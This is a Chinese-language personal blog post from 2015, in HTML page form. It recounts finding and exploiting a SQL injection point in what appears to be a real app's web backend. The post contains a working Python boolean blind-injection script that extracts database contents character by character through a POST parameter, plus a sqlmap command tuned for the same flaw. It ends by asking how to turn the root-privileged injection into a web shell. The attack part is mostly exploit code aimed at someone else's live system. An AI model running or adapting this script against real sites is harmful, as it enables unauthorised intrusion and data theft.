<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="SQL,Pentest,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="最近遇到一个比较有意思的注入点，可以说通过这个注入点的深入挖掘对SQL语句的运用，SQL注入的原理乃至MySQL数据库的特点都有了比较完整的认识。 接下来简单记录以下发现及利用的过程。 #0x01 发现 不是我吹牛，这个注入点属于可遇不可求的那种：），用一般扫描器是绝对扫不到的，也许也只有无聊的人会用这么愚蠢的方法找注入点，无计可施的情形下找到这样的漏洞说不定也真是运气好。 目标站是某APP的we">
<meta name="keywords" content="SQL,Pentest">
<meta property="og:type" content="article">
<meta property="og:title" content="MYSQL Blind Injectino tricks">
<meta property="og:url" content="http://matshao.com/2015/07/29/MYSQL-Blind-Injectino-tricks/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="最近遇到一个比较有意思的注入点，可以说通过这个注入点的深入挖掘对SQL语句的运用，SQL注入的原理乃至MySQL数据库的特点都有了比较完整的认识。 接下来简单记录以下发现及利用的过程。 #0x01 发现 不是我吹牛，这个注入点属于可遇不可求的那种：），用一般扫描器是绝对扫不到的，也许也只有无聊的人会用这么愚蠢的方法找注入点，无计可施的情形下找到这样的漏洞说不定也真是运气好。 目标站是某APP的we">
<meta property="og:locale" content="zh-hk">
<meta property="og:image" content="http://7j1yti.com1.z0.glb.clouddn.com/mysql1.jpg">
<meta property="og:image" content="http://7j1yti.com1.z0.glb.clouddn.com/mysql2.jpg">
<meta property="og:updated_time" content="2015-07-29T15:21:20.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MYSQL Blind Injectino tricks">
<meta name="twitter:description" content="最近遇到一个比较有意思的注入点，可以说通过这个注入点的深入挖掘对SQL语句的运用，SQL注入的原理乃至MySQL数据库的特点都有了比较完整的认识。 接下来简单记录以下发现及利用的过程。 #0x01 发现 不是我吹牛，这个注入点属于可遇不可求的那种：），用一般扫描器是绝对扫不到的，也许也只有无聊的人会用这么愚蠢的方法找注入点，无计可施的情形下找到这样的漏洞说不定也真是运气好。 目标站是某APP的we">
<meta name="twitter:image" content="http://7j1yti.com1.z0.glb.clouddn.com/mysql1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2015/07/29/MYSQL-Blind-Injectino-tricks/">





  <title> MYSQL Blind Injectino tricks | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  





<script>
  	var _mtac = {};
  	(function() {
  		var mta = document.createElement("script");
  		mta.src = "http://pingjs.qq.com/h5/stats.js?v2.0.4";
  		mta.setAttribute("name", "MTAH5");
  		mta.setAttribute("sid", "500688563");
  		var s = document.getElementsByTagName("script")[0];
  		s.parentNode.insertBefore(mta, s);
  	})();
</script>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2015/07/29/MYSQL-Blind-Injectino-tricks/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                MYSQL Blind Injectino tricks
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2015-07-29T21:02:22+08:00">
                2015-07-29
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近遇到一个比较有意思的注入点，可以说通过这个注入点的深入挖掘对SQL语句的运用，SQL注入的原理乃至MySQL数据库的特点都有了比较完整的认识。<br>
接下来简单记录以下发现及利用的过程。<br>
#0x01 发现<br>
不是我吹牛，这个注入点属于可遇不可求的那种：），用一般扫描器是绝对扫不到的，也许也只有无聊的人会用这么愚蠢的方法找注入点，无计可施的情形下找到这样的漏洞说不定也真是运气好。<br>
目标站是某APP的web后台，注册后挂上BurpSuite代理随便翻翻，后来发现一个POST包，只有一个参数。加单引号报错，加两个单引号就不报错了，这下有一半把握是注入了。再尝试构造合法SQL语句检测，如图：</p>
<a id="more"></a>
<p><img src="http://7j1yti.com1.z0.glb.clouddn.com/mysql1.jpg" alt="img"><span class="image-caption">img</span><br>
<img src="http://7j1yti.com1.z0.glb.clouddn.com/mysql2.jpg" alt="img"><span class="image-caption">img</span><br>
眼瞎，起初只是发现response的长度不同(其实根据这个来判断已经足够)，后来仔细查看才发现如图中红色标注的区别：条件为真返回adminPrivates的一个值，条件为假则没有。<br>
#0x02 初步利用<br>
确认有注入就开始利用了，一开始是直接包POST保存下来扔到SQLMAP自动检测，结果死活检测不出，差点就放弃了。仔细想想，既然原理是对的，漏洞肯定存在，实在不行就自己写EXP。于是调高了SQLMAP的level，这下检测出来了stacked-query，但是还是time-based的，速度慢不说，还容易把网站睡死。<br>
接下来就上乌云翻了lijiejie常说的盲注脚本，照葫画瓢地写了个EXP</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> httplib</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'Content-Type'</span>:<span class="string">'application/x-www-form-urlencoded; charset=UTF-8'</span>,</span><br><span class="line"><span class="string">'Cookie'</span>: <span class="string">''</span>&#125;</span><br><span class="line"></span><br><span class="line">pwdletters = <span class="string">'\0!"#$%&amp;\'()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz~'</span></span><br><span class="line"></span><br><span class="line">letters = <span class="string">'\0#0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz~'</span></span><br><span class="line"></span><br><span class="line">numletters = <span class="string">'\0#0123456789'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Start... '</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test</span><span class="params">(payload, count, num, letter)</span>:</span></span><br><span class="line">    s =<span class="string">"' ) and (select ascii((substr((%s limit %d,1),%d,1)))&gt;ascii('%s'))-- -"</span> % (payload, count,num,letter) <span class="comment"># acsii version</span></span><br><span class="line"></span><br><span class="line">    body = <span class="string">"userId=u159712%s"</span> % urllib.quote(s)</span><br><span class="line">    conn = httplib.HTTPSConnection(<span class="string">'xxx.xxx.com'</span>, timeout=<span class="number">10</span>)</span><br><span class="line">    conn.request(method=<span class="string">'POST'</span>,</span><br><span class="line">                url=<span class="string">'/xxx/xxx-info'</span>,</span><br><span class="line">                body=body,</span><br><span class="line">                headers=headers)</span><br><span class="line">    response = conn.getresponse()</span><br><span class="line">    content = response.read()</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"%s : %d"</span> %(letter, len(content))</span><br><span class="line">    <span class="keyword">if</span> len(content) &gt; <span class="number">4376</span>: <span class="comment"># change this value according to the response length</span></span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span> <span class="comment">#the letter should be larger than this guess</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">BinSearch</span><span class="params">(payload,length,count)</span>:</span></span><br><span class="line">    output = open(<span class="string">'result.txt'</span>,<span class="string">'a'</span>)</span><br><span class="line">    output.write(<span class="string">'\n'</span>+payload+<span class="string">'::'</span>+str(count)+<span class="string">'\n'</span>)</span><br><span class="line">    <span class="keyword">print</span> payload</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,length+<span class="number">1</span>):</span><br><span class="line">        low = <span class="number">0</span></span><br><span class="line">        high = len(pwdletters) - <span class="number">1</span></span><br><span class="line">        <span class="keyword">while</span> (low != high):</span><br><span class="line">            mid = (low+high)/<span class="number">2</span></span><br><span class="line">            <span class="keyword">if</span> (test(payload,count, i, pwdletters[mid])):</span><br><span class="line">                low = mid + <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                high = mid </span><br><span class="line">        <span class="keyword">print</span> <span class="string">"\033[1;32m%s\033[0m"</span> % (pwdletters[low])</span><br><span class="line">        output.write(pwdletters[low])</span><br><span class="line">        <span class="keyword">if</span> (high == <span class="number">0</span>):</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    output.write(<span class="string">'\n'</span>)</span><br><span class="line">    output.close()</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"[*] Finish!"</span></span><br></pre></td></tr></table></figure>
<p>第一版代码知识简单遍历每个字母的ascii码来获取数据，后来改进了，使用二分法，发送请求明显减少。使用的话首先要注意条件为真和假是返回数据包的长度,代码本身就不是写得很好，又比较心急，每次调用都是用ipython，import 这个py文件，然后调用BinSearch函数来获取数据，这样用shell来操作有个好处就是用SQL查询语句作为payload而且方便更改。当初凑&quot;’ ) and (select ascii((substr((%s limit %d,1),%d,1)))&gt;ascii(‘%s’))-- -“这个payload可是花了不少时间。<br>
#0x03 另一种方法<br>
后来发现他们说的没错，蠢人就是喜欢重复造轮子。SQLMAP明明就可以直接搞定这种漏洞啊，何必自己写EXP？要用到的参数是–string，用户可以通过–string设定条件为真时候页面出现的字符串，观察response这里要填的就是–string=”_pa&quot;（简单又足够区分真假条件）。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u <span class="string">""</span> --data=<span class="string">""</span> --cookie=<span class="string">""</span> --string=<span class="string">"_pa"</span></span><br></pre></td></tr></table></figure>
<p>基本命令格式就是这样，待确认漏洞类型以后，可以指定–technique=B来进行盲注，就不用忍受慢吞吞的time-based了，还可以用–threads=来进行多线程，速度提升明显。<br>
#0x04 总结&amp;后话<br>
虽然一开始写EXP是比较蠢，但是通过动手熟悉了注入payload的构造，也是一种提高。值得一提的是，这是一个root权限的注入点，可是数据库里保存的用密码是用类似AES256的算法加密的，应该还加了salt。既搞不到管理员账号又找不到后台。最后一条路就是用root读写权限直接写shell，可是用尽办法都找不到网站物理路径。在root权限注入点下，还有办法get shell吗？</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL/" rel="tag"># SQL</a>
          
            <a href="/tags/Pentest/" rel="tag"># Pentest</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2015/07/05/20/" rel="next" title="20">
                <i class="fa fa-chevron-left"></i> 20
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2015/09/05/Mr-Robot/" rel="prev" title="Mr.Robot">
                Mr.Robot <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      

      <section class="site-overview sidebar-panel sidebar-panel-active">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description">🎓</p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">65</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
